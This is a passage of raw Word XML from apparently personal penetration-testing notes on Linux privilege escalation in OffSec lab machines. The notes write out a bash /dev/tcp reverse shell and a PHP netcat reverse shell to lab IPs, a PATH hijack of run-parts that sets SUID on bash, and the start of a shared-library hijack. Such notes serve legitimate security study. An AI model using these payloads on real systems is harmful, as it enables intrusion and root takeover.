    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002448">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So we can put in a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002449">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1220"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'sh -i &gt;&amp; /dev/tcp/192.168.45.232/4444 0&gt;&amp;1' &gt; log-backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000244A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start listening and wait for root shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000244B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1220"/>
        </w:numPr>
        <w:ind w:left="144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244C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000244D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example of this was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId771">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Lavita</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice where there was a file being run by a user (not root) and it was being run using PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000244E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1562100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="577" name="image561.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image561.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77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244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we had access to /var/www/html/artisan, so we could replace that file with a PHP rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002450">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="566"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv artisan artisan.origital</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002451">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="566"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rename original file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002452">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="566"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '&lt;?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.45.174 1234 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;/tmp/f"); ?&gt;' &gt; artisan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002453">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="566"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in a rev shell into malicious file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002454">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002455">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dfgbyzxqp8y9" w:id="323"/>
      <w:bookmarkEnd w:id="323"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Putting malicious file in PATH with high priority (/usr/bin/local)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002456">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002457">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId773">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Roquefort</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2458">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2311400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="239" name="image234.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image234.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId774"/>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2459">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000245A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that we can edit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is often seen in the PATH of cron jobs, so if there is a cron job with unspecified path, then we can make it run our malicious version of the file. '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000245B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000245C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="508000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="171" name="image162.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image162.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77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245D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/bin is almost top priority in PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000245E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000245F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="93" name="image83.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image83.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77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2460">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002461">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then check pspy which is running a binary called run-parts and it seems to be associated with /etc/cron.hourly. However, I don't think this means it's run every hour. I think the /etc/cron.hourly is an argument to this command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002462">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002463">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3949700" cy="711200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41" name="image36.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image36.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId777"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="39497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2464">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002465">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then check to see where the real run-parts is located and it's in /bin which is LOWER priority than /usr/local/bin in the path, meaning if we can add a file called run-parts to /usr/local/bin, then it will run ours, assuming it runs "run-parts" without full path which it looks like it is from the pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002466">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002467">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002468">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "chmod +s /bin/bash" &gt; /usr/local/bin/run-parts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002469">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x /usr/local/bin/run-parts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then check /bin/bash after a while and see if SUID bit is set! IF so, run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1114"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And you have root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u42c4y6uh5ha" w:id="324"/>
      <w:bookmarkEnd w:id="324"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding malicious missing .so file by putting in directory that is part of LD_LIBRARY_PATH path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000246F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002470">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_LIBRARY_PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002471">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an environment variable that tells Linux where to look for shared libraries (.so) first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002472">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002473">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId778">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice. It is also explained in the official Offsec writeup. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002474">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002475">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First we saw a cron job that ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/log-sweeper </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">so we tried running it ourselves</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002476">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="964"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
